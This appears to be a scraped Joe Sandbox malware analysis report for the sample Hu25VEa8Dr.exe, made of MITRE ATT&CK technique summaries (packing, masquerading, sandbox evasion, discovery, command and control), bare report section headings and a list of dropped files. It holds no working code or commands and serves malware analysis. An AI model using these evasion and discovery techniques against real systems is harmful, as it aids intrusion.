Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hu25VEa8Dr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Local Settings\Temp\msoiruj.bat

C:\Users\user\AppData\Local\Temp\0BBFF.tmp

C:\Users\user\AppData\Local\Temp\0BBFF.tmp:Zone.Identifier

C:\Users\user\AppData\Local\Temp\Firozedikami.dll

C:\Users\user\AppData\Local\Temp\Gozekeneka.dll

C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll

C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe

C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe

C:\Users\user\AppData\Local\Temp\Sahofivizu.exe

C:\Users\user\AppData\Local\Temp\Yumicebivud.rih

C:\Users\user\AppData\Local\Temp\Zojemilocan.dll

C:\Users\user\AppData\Local\Temp\naseropuxeq.dll

C:\Users\user\AppData\Local\Temp\natigezeholi.dll

Windows Analysis Report
Hu25VEa8Dr.exe

Function 004030FA Relevance: 68.5, APIs: 24, Strings: 15, Instructions: 270
filestringcomCOMMON

Function 00405331 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre